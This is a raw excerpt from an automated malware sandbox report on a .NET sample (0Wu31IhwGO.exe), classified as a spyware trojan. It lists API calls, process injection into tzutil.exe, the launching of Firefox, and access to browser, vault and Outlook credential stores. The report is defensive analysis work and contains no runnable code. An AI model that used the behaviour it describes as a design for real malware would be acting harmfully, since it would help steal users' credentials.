                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392F90 NtProtectVirtualMemory,4_2_01392F90
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392FE0 NtCreateFile,4_2_01392FE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392E30 NtWriteVirtualMemory,4_2_01392E30
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392EA0 NtAdjustPrivilegesToken,4_2_01392EA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392E80 NtReadVirtualMemory,4_2_01392E80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392EE0 NtQueueApcThread,4_2_01392EE0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393010 NtOpenDirectoryObject,4_2_01393010
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393090 NtSetValueKey,4_2_01393090
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013939B0 NtGetContextThread,4_2_013939B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393D10 NtOpenProcessToken,4_2_01393D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01393D70 NtOpenThread,4_2_01393D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E84340 NtSetContextThread,LdrInitializeThunk,8_2_02E84340
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E84650 NtSuspendThread,LdrInitializeThunk,8_2_02E84650
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82AF0 NtWriteFile,LdrInitializeThunk,8_2_02E82AF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82AD0 NtReadFile,LdrInitializeThunk,8_2_02E82AD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82BE0 NtQueryValueKey,LdrInitializeThunk,8_2_02E82BE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_02E82BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_02E82BA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82B60 NtClose,LdrInitializeThunk,8_2_02E82B60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82EE0 NtQueueApcThread,LdrInitializeThunk,8_2_02E82EE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_02E82E80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82FE0 NtCreateFile,LdrInitializeThunk,8_2_02E82FE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82FB0 NtResumeThread,LdrInitializeThunk,8_2_02E82FB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82F30 NtCreateSection,LdrInitializeThunk,8_2_02E82F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_02E82CA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82C60 NtCreateKey,LdrInitializeThunk,8_2_02E82C60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_02E82C70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02E82DF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82DD0 NtDelayExecution,LdrInitializeThunk,8_2_02E82DD0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_02E82D30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82D10 NtMapViewOfSection,LdrInitializeThunk,8_2_02E82D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E835C0 NtCreateMutant,LdrInitializeThunk,8_2_02E835C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E839B0 NtGetContextThread,LdrInitializeThunk,8_2_02E839B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82AB0 NtWaitForSingleObject,8_2_02E82AB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82B80 NtQueryInformationFile,8_2_02E82B80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82EA0 NtAdjustPrivilegesToken,8_2_02E82EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82E30 NtWriteVirtualMemory,8_2_02E82E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82FA0 NtQuerySection,8_2_02E82FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82F90 NtProtectVirtualMemory,8_2_02E82F90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82F60 NtCreateProcessEx,8_2_02E82F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82CF0 NtOpenProcess,8_2_02E82CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82CC0 NtQueryVirtualMemory,8_2_02E82CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82C00 NtQueryInformationProcess,8_2_02E82C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82DB0 NtEnumerateKey,8_2_02E82DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E82D00 NtSetInformationFile,8_2_02E82D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83090 NtSetValueKey,8_2_02E83090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83010 NtOpenDirectoryObject,8_2_02E83010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83D70 NtOpenThread,8_2_02E83D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E83D10 NtOpenProcessToken,8_2_02E83D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B96E0 NtDeleteFile,8_2_026B96E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B9780 NtClose,8_2_026B9780
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B9480 NtCreateFile,8_2_026B9480
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B95F0 NtReadFile,8_2_026B95F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026B98E0 NtAllocateVirtualMemory,8_2_026B98E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E401008_2_02E40100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EEA1188_2_02EEA118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6C6E08_2_02E6C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E4C7C08_2_02E4C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E507708_2_02E50770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E747508_2_02E74750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EFE4F68_2_02EFE4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F024468_2_02F02446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF44208_2_02EF4420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F105918_2_02F10591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E505358_2_02E50535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E4EA808_2_02E4EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F06BD78_2_02F06BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0AB408_2_02F0AB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E7E8F08_2_02E7E8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E368B88_2_02E368B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E528408_2_02E52840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5A8408_2_02E5A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E529A08_2_02E529A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F1A9A68_2_02F1A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E669628_2_02E66962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0EEDB8_2_02F0EEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0CE938_2_02F0CE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E62E908_2_02E62E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E50E598_2_02E50E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0EE268_2_02F0EE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5CFE08_2_02E5CFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E42FC88_2_02E42FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02ECEFA08_2_02ECEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC4F408_2_02EC4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E92F288_2_02E92F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E70F308_2_02E70F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF2F308_2_02EF2F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E40CF28_2_02E40CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF0CB58_2_02EF0CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E50C008_2_02E50C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E4ADE08_2_02E4ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E68DBF8_2_02E68DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5AD008_2_02E5AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EECD1F8_2_02EECD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF12ED8_2_02EF12ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6B2C08_2_02E6B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E552A08_2_02E552A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E9739A8_2_02E9739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E3D34C8_2_02E3D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0132D8_2_02F0132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0F0E08_2_02F0F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F070E98_2_02F070E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EFF0CC8_2_02EFF0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E570C08_2_02E570C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E5B1B08_2_02E5B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E8516C8_2_02E8516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E3F1728_2_02E3F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F1B16B8_2_02F1B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F016CC8_2_02F016CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E956308_2_02E95630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0F7B08_2_02F0F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E414608_2_02E41460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0F43F8_2_02F0F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F195C38_2_02F195C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EED5B08_2_02EED5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F075718_2_02F07571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EFDAC68_2_02EFDAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EEDAAC8_2_02EEDAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E95AA08_2_02E95AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EF1AA38_2_02EF1AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC3A6C8_2_02EC3A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F07A468_2_02F07A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FA498_2_02F0FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E8DBF98_2_02E8DBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC5BF08_2_02EC5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6FB808_2_02E6FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FB768_2_02F0FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E538E08_2_02E538E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EBD8008_2_02EBD800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E599508_2_02E59950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6B9508_2_02E6B950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E59EB08_2_02E59EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E13FD28_2_02E13FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E13FD58_2_02E13FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FFB18_2_02F0FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E51F928_2_02E51F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FF098_2_02F0FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F0FCF28_2_02F0FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02EC9C328_2_02EC9C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E6FDC08_2_02E6FDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F07D738_2_02F07D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02E53D408_2_02E53D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02F01D5A8_2_02F01D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A21308_2_026A2130
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269D2708_2_0269D270
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269B2908_2_0269B290
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269B3E08_2_0269B3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269D0488_2_0269D048
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0269D0508_2_0269D050
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A57F08_2_026A57F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A3A008_2_026A3A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026A39FB8_2_026A39FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_026BBD508_2_026BBD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5E4268_2_02D5E426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5E5448_2_02D5E544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5E8DC8_2_02D5E8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5D9A88_2_02D5D9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02D5CC488_2_02D5CC48
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02E97E54 appears 111 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02ECF290 appears 105 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02E85130 appears 50 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02E3B970 appears 279 times
                Source: C:\Windows\SysWOW64\tzutil.exe Code function: String function: 02EBEA12 appears 86 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: String function: 01395130 appears 58 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: String function: 0134B970 appears 280 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: String function: 013A7E54 appears 102 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: String function: 013CEA12 appears 86 times
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Code function: String function: 013DF290 appears 105 times
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1676770459.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1683020776.000000000A520000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1680248907.0000000006FC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000000.1420857524.000000000089A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVcmB.exe4 vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000000.00000002.1675878996.000000000103E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametzutil.exej% vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000004.00000002.2325226087.000000000144D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenametzutil.exej% vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe Binary or memory string: OriginalFilenameVcmB.exe4 vs 0Wu31IhwGO.exe
                Source: 0Wu31IhwGO.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0Wu31IhwGO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@7/6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Wu31IhwGO.exe.log
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\tzutil.exe File created: C:\Users\user\AppData\Local\Temp\UQ63g7r-
                Source: 0Wu31IhwGO.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: tzutil.exe, 00000008.00000002.3282626615.0000000002865000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3282626615.0000000002888000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2514155110.0000000002836000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2514266920.0000000002858000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3282626615.0000000002858000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 0Wu31IhwGO.exe ReversingLabs: Detection: 73%
                Source: 0Wu31IhwGO.exe Virustotal: Detection: 76%
                Source: unknown Process created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Process created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\tzutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: 0Wu31IhwGO.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 0Wu31IhwGO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: tzutil.pdbGCTL source: 0Wu31IhwGO.exe, 00000004.00000002.2324759370.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283377608.0000000001648000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EPnOHZVVNotZ.exe, 00000007.00000000.2235052111.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3282425393.00000000008FE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: 0Wu31IhwGO.exe, 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2323749197.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2326573240.0000000002C60000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3284206752.0000000002FAE000.00000040.00001000.00020000.00000000.sdmp
